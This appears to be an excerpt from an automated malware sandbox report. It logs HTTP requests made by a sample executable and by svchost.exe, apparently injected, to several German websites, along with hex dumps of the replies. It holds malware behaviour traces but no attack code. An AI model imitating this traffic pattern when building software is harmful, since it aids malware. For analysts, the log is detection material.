                                                                                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        2023-03-10 06:56:17 UTC863INData Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c
                                                                                                                                                                                                                                                                        Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        64192.168.2.656364138.201.65.187443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:18 UTC962OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: diamir.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:18 UTC997INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:18 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 162
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Location: https://www.diamir.de/
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                        2023-03-10 06:56:18 UTC998INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        65192.168.2.656444188.114.97.3443C:\Users\user\Desktop\iJzpyjAehB.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:18 UTC1011OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: sigtoa.com
                                                                                                                                                                                                                                                                        2023-03-10 06:56:18 UTC1023INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:18 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                                                        Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tx0pW3FIBojMmSFowDCQq5GOBCTsr5MZNsh3Ix0O4no%2FZqumLDsnNekv%2BNPg9GooDhJktT%2BU2MuK7db4ypDd3Lyf6oqBO1fVTGbvxPRicU6C%2Fk7lQzz2KWm0qrPw"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a833cb123645-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:56:18 UTC1024INData Raw: 31 65 62 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78
                                                                                                                                                                                                                                                                        Data Ascii: 1ebc<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=Edge"> <meta name="robots" content="noindex
                                                                                                                                                                                                                                                                        2023-03-10 06:56:18 UTC1024INData Raw: 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 77 72 61 70 70 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 20 68 31 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20
                                                                                                                                                                                                                                                                        Data Ascii: idth,initial-scale=1"> <link href="/cdn-cgi/styles/challenges.css" rel="stylesheet"> </head><body class="no-js"> <div class="main-wrapper" role="main"> <div class="main-content"> <h1 class="zone-name-title h1"> <img
                                                                                                                                                                                                                                                                        2023-03-10 06:56:18 UTC1026INData Raw: 69 6f 6e 3d 22 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 66 5f 74 6b 3d 45 46 6a 54 77 73 73 4a 4b 61 42 72 44 48 73 5a 4e 5f 49 63 49 5f 5f 76 4c 73 6c 41 78 6c 61 2e 63 62 30 68 65 52 73 6c 57 63 4d 2d 31 36 37 38 34 33 31 33 37 38 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 52 41 22 20 6d 65 74 68 6f 64 3d 22 50 4f 53 54 22 20 65 6e 63 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 6d 64 22 20 76 61 6c 75 65 3d 22 43 30 5f 39 57 5f 5a 79 37 34 70 70 31 30 47 6a 61 6d 62 6f 53 4e 79 42 62 6b 63 78 55 4f 50 7a 57 42 6e 70 58 7a 4e 53 36 70 30 2d 31 36 37 38 34 33 31 33 37 38 2d
                                                                                                                                                                                                                                                                        Data Ascii: ion="/?__cf_chl_f_tk=EFjTwssJKaBrDHsZN_IcI__vLslAxla.cb0heRslWcM-1678431378-0-gaNycGzNCRA" method="POST" enctype="application/x-www-form-urlencoded"> <input type="hidden" name="md" value="C0_9W_Zy74pp10GjamboSNyBbkcxUOPzWBnpXzNS6p0-1678431378-
                                                                                                                                                                                                                                                                        2023-03-10 06:56:18 UTC1027INData Raw: 36 4b 34 45 78 32 5f 66 53 52 34 45 71 47 4f 58 56 6a 7a 45 4b 36 62 30 75 38 6d 45 4e 47 51 70 35 47 51 4d 31 31 6e 4c 61 5a 45 72 56 46 72 6e 34 76 7a 67 61 57 6f 69 37 66 37 6f 6f 41 4e 57 6c 2d 49 6e 78 73 4f 51 74 6f 39 4c 44 5f 79 34 4d 31 79 66 67 4b 53 70 6e 62 4e 6f 63 41 70 56 4c 4e 4e 61 72 6a 7a 50 2d 42 37 53 59 6e 32 66 75 72 6d 37 2d 6c 68 44 6f 75 36 69 47 36 6c 41 67 36 58 43 50 6a 36 31 42 74 58 31 56 2d 47 51 33 71 62 68 73 56 69 71 6b 4a 67 4d 55 67 45 75 43 62 76 6b 73 76 66 64 37 6f 47 67 6d 46 64 6b 38 67 53 4a 35 78 53 41 62 4c 70 71 38 4f 4e 4f 6e 56 74 30 33 41 74 38 4c 32 58 4c 52 4f 56 39 70 5a 6b 4f 66 4c 79 5f 59 70 65 4d 6e 4f 71 30 53 63 36 6b 70 59 6c 79 64 52 47 5f 42 39 71 59 35 44 41 31 33 72 32 43 78 77 59 41 59 76 45
                                                                                                                                                                                                                                                                        Data Ascii: 6K4Ex2_fSR4EqGOXVjzEK6b0u8mENGQp5GQM11nLaZErVFrn4vzgaWoi7f7ooANWl-InxsOQto9LD_y4M1yfgKSpnbNocApVLNNarjzP-B7SYn2furm7-lhDou6iG6lAg6XCPj61BtX1V-GQ3qbhsViqkJgMUgEuCbvksvfd7oGgmFdk8gSJ5xSAbLpq8ONOnVt03At8L2XLROV9pZkOfLy_YpeMnOq0Sc6kpYlydRG_B9qY5DA13r2CxwYAYvE
                                                                                                                                                                                                                                                                        2023-03-10 06:56:18 UTC1028INData Raw: 20 20 63 52 61 79 3a 20 27 37 61 35 39 61 38 33 33 63 62 31 32 33 36 34 35 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 48 61 73 68 3a 20 27 64 64 35 61 31 32 61 62 35 37 35 62 35 34 39 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 45 46 6a 54 77 73 73 4a 4b 61 42 72 44 48 73 5a 4e 5f 49 63 49 5f 5f 76 4c 73 6c 41 78 6c 61 2e 63 62 30 68 65 52 73 6c 57 63 4d 2d 31 36 37 38 34 33 31 33 37 38 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 52 41 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 46 50 57 76 3a 20 27 67 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 54 54 69 6d 65 4d 73 3a 20 27 31 30 30 30 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 4d 54 69 6d 65 4d 73 3a 20 27 30 27 2c 0a
                                                                                                                                                                                                                                                                        Data Ascii: cRay: '7a59a833cb123645', cHash: 'dd5a12ab575b549', cUPMDTk: "\/?__cf_chl_tk=EFjTwssJKaBrDHsZN_IcI__vLslAxla.cb0heRslWcM-1678431378-0-gaNycGzNCRA", cFPWv: 'g', cTTimeMs: '1000', cMTimeMs: '0',
                                                                                                                                                                                                                                                                        2023-03-10 06:56:18 UTC1030INData Raw: 5a 38 6f 67 46 4e 78 55 79 7a 4c 53 68 2b 58 51 3d 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 32 3a 20 27 30 55 6e 68 6d 51 7a 59 74 32 49 71 7a 35 4e 73 36 57 59 7a 71 41 3d 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7a 68 3a 20 27 64 4c 68 39 34 5a 58 4c 73 4d 61 54 6f 47 44 33 2f 71 39 42 69 75 6d 61 63 36 79 78 51 56 55 5a 34 63 32 6a 74 34 59 4a 6e 61 55 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 75 68 3a 20 27 66 78 75 35 2f 69 51 76 50 2f 7a 6e 41 4c 39 38 63 46 50 70 7a 30 44 6a 72 6d 45 33 6f 34 34 57 4d 64 5a 72 36 61 5a 51 52 73 51 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 68 3a 20 27 6a 57 32 78 52 42 73 71 57 31 76 4c 74 75 42 6f 6f 58 39 61 4b 6d 45 44 32 63 5a 68 41
                                                                                                                                                                                                                                                                        Data Ascii: Z8ogFNxUyzLSh+XQ==', i2: '0UnhmQzYt2Iqz5Ns6WYzqA==', zh: 'dLh94ZXLsMaToGD3/q9Biumac6yxQVUZ4c2jt4YJnaU=', uh: 'fxu5/iQvP/znAL98cFPpz0DjrmE3o44WMdZr6aZQRsQ=', hh: 'jW2xRBsqW1vLtuBooX9aKmED2cZhA
                                                                                                                                                                                                                                                                        2023-03-10 06:56:18 UTC1031INData Raw: 2e 63 4f 67 55 48 61 73 68 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 70 6f 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 28 6e 75 6c 6c 2c 20 6e 75 6c 6c 2c 20 6f 67 55 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 63 70 6f 29 3b 0a 20 20 20 20 7d 28 29 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 22 20 72 6f 6c 65 3d 22 63 6f 6e 74 65 6e
                                                                                                                                                                                                                                                                        Data Ascii: .cOgUHash); cpo.onload = function() { history.replaceState(null, null, ogU); }; } document.getElementsByTagName('head')[0].appendChild(cpo); }());</script> <div class="footer" role="conten
                                                                                                                                                                                                                                                                        2023-03-10 06:56:18 UTC1032INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        66192.168.2.656453185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:18 UTC1056OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: techtrans.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:18 UTC1068INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:18 GMT
                                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                        Expires: 0
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        2023-03-10 06:56:18 UTC1069INData Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c
                                                                                                                                                                                                                                                                        Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        67192.168.2.656493138.201.65.187443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:18 UTC1056OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: www.diamir.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:18 UTC1069INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:18 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 548
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                        2023-03-10 06:56:18 UTC1070INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20
                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        68192.168.2.6565105.189.171.125443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:18 UTC1070OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: www.muhr-soehne.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:18 UTC1070INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:18 GMT
                                                                                                                                                                                                                                                                        Server: Apache/2.4.38 (Debian)
                                                                                                                                                                                                                                                                        Last-Modified: Thu, 02 Mar 2023 15:05:19 GMT
                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                        Content-Length: 51841
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                        2023-03-10 06:56:18 UTC1071INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 64 65 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 21 2d 2d 20 0a 09 6d 61 64 65 20 62 79 20 50 53 56 6e 65 6f 0a 0a 09 54 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 70 6f 77 65 72 65 64 20 62 79 20 54 59 50 4f 33 20 2d 20 69 6e 73 70 69 72 69 6e 67 20 70 65 6f 70 6c 65 20 74 6f 20 73 68 61 72 65 21 0a 09 54 59 50 4f 33 20 69 73 20 61 20 66 72 65 65 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 20 46 72 61 6d 65 77 6f 72 6b 20 69 6e 69 74 69 61 6c 6c 79 20 63 72 65 61 74 65 64 20 62 79 20 4b 61 73 70 65 72 20 53 6b 61 61 72 68 6f 6a 20
                                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html dir="ltr" lang="de"><head><meta charset="utf-8">... made by PSVneoThis website is powered by TYPO3 - inspiring people to share!TYPO3 is a free open source Content Management Framework initially created by Kasper Skaarhoj
                                                                                                                                                                                                                                                                        2023-03-10 06:56:18 UTC1087INData Raw: 20 20 20 20 20 20 20 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 6c 61 79 6f 75 74 2d 30 20 20 22 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 76 65 72 73 63 68 6c 69 65
                                                                                                                                                                                                                                                                        Data Ascii: Verschliemaschinen </a> </li> <li class="nav-item layout-0 "> <a href="/verschlie
                                                                                                                                                                                                                                                                        2023-03-10 06:56:18 UTC1103INData Raw: 66 72 61 6d 65 2d 6c 61 79 6f 75 74 2d 30 20 20 20 6d 74 2d 30 20 6d 62 2d 30 0a 20 20 20 20 0a 0a 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 6c 2d 33 20 63 6f 6c 2d 6c 67 2d 36 20 63 6f 6c 2d 6d 64 2d 36 20 63 6f 6c 2d 73 6d 2d 31 32 20 63 6f 6c 2d 31 32 20 6d 79 2d 34 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 65 72 76 69 63 65 62 6f 78 20 68 2d 31 30 30 20 62 67 2d 6c 69 67 68 74 2d 67 72 65 79 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 63 6f 6c 75 6d 6e 20 68 2d 31 30 30 20 77 2d 31 30 30 20 70 2d 33 20 22 3e 0a
                                                                                                                                                                                                                                                                        Data Ascii: frame-layout-0 mt-0 mb-0 "> <div class="row"> <div class="col-xl-3 col-lg-6 col-md-6 col-sm-12 col-12 my-4"> <div class="servicebox h-100 bg-light-grey d-flex flex-column h-100 w-100 p-3 ">
